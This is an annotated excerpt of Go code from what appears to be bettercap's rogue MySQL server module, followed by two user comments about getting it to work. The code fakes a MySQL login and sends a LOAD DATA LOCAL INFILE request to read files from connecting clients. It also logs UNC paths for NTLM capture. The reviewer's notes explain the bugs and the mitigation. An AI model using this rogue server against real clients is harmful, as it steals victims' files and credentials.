// Accept loop of the rogue MySQL server module (excerpt; the enclosing
// function and the end of the loop are not shown). For each TCP client it
// sends a canned greeting, parses just enough of the login packet to log the
// username and the LOAD DATA LOCAL capability bit, then sends the canned
// GetFile packet and logs whatever the client returns for mysql.infile.
// Defensive context: the read only succeeds when the connecting client honours
// a server-initiated LOCAL INFILE request, so keeping local-infile disabled
// in clients and connectors is the relevant mitigation.
for mysql.Running() {
	// tcp listener
	conn, err := mysql.listener.AcceptTCP()
	if err != nil {
		log.Warning("Error while accepting TCP connection: %s", err)
		continue
	}
	// send the mysql greeting
	// NOTE(review): the result of every conn.Write in this loop is ignored.
	conn.Write([]byte(MySQLGreeting))
	// read the incoming responses and retrieve infile
	// TODO: include binary support and files > 16kb
	b := make([]byte, 16384)
	// NOTE(review): byte count and error are discarded; if nothing is read,
	// b stays zero-filled and the length check below skips the connection.
	bufio.NewReader(conn).Read(b)
	// parse client capabilities and validate connection
	// TODO: parse mysql connections properly and
	// display additional connection attributes
	// b[4] and b[5] are combined little-endian into a 16-bit value and rendered
	// in binary, zero-padded to at least 8 digits. Presumably these are the low
	// two bytes of the capability flags that follow the 4-byte packet header.
	clientCapabilities := fmt.Sprintf("%08b", (int(uint32(b[4]) | uint32(b[5])<<8)))
	// The string is 16 characters long only when bit 15 of that value is set;
	// this is the sole validation applied to the login packet.
	if len(clientCapabilities) == 16 {
		// NOTE(review): splitting on ":" yields "[" for bracketed IPv6
		// addresses; net.SplitHostPort would handle both address families.
		remoteAddress := strings.Split(conn.RemoteAddr().String(), ":")[0]
		log.Info("MySQL connection from: %s", remoteAddress)
		// Index 8 of the 16-digit string is bit 7 (0x0080), the
		// CLIENT_LOCAL_FILES flag. It is only logged: GetFile is sent below
		// whether or not the client advertises it.
		loadData := string(clientCapabilities[8])
		log.Info("Can Use LOAD DATA LOCAL: %s", loadData)
		// Username is taken as the bytes from offset 36 up to the first NUL.
		username := bytes.Split(b[36:], []byte{0})[0]
		log.Info("MySQL Login Request Username: %s", username)
		// send initial responseOK
		conn.Write([]byte(FirstResponseOK))
		// Client's next packet is read into b and not inspected.
		bufio.NewReader(conn).Read(b)
		conn.Write([]byte(GetFile))
		infileLen, err := bufio.NewReader(conn).Read(b)
		if err != nil {
			log.Warning("Error while reading buffer: %s", err)
			// NOTE(review): this path skips to the next client without closing conn.
			continue
		}
		// check if the infile is an UNC path
		// Only the first character (a single backslash) is tested, and this
		// branch does nothing but log; no relaying happens in the visible code.
		if strings.HasPrefix(mysql.infile, "\\") {
			log.Info("NTLM from '%s' relayed to %s", remoteAddress, mysql.infile)
		} else {
			// print the infile content, ignore mysql protocol headers
			// TODO: include binary support and output to a file
			// NOTE(review): the slice bound infileLen-4 is below 4 when fewer
			// than 8 bytes were read, which panics. Only a single Read of at
			// most 16384 bytes is logged, so larger files are truncated.
			log.Info("Retrieving '%s' from %s (%d bytes)\n%s", mysql.infile, remoteAddress, infileLen-9, string(b)[4:infileLen-4])
		}
		// send additional response
		conn.Write([]byte(SecondResponseOK))
		bufio.NewReader(conn).Read(b)
	}
	// NOTE(review): a defer inside a loop runs when the enclosing function
	// returns, not at the end of each iteration, so every accepted connection
	// stays open until then.
	defer conn.Close()
(...) |
Just to let you know that your module works great, and that I was to blame. The error came from a malformed SQL query.
OK, I'll give it a try. I first tried https://github.com/allyshka/Rogue-MySql-Server/blob/master/rogue_mysql_server.py, but it spat out a lot of exceptions, and after reading your post https://w00tsec.blogspot.com/2018/04/abusing-mysql-local-infile-to-read.html I thought I'd give bettercap a try, as everything was integrated.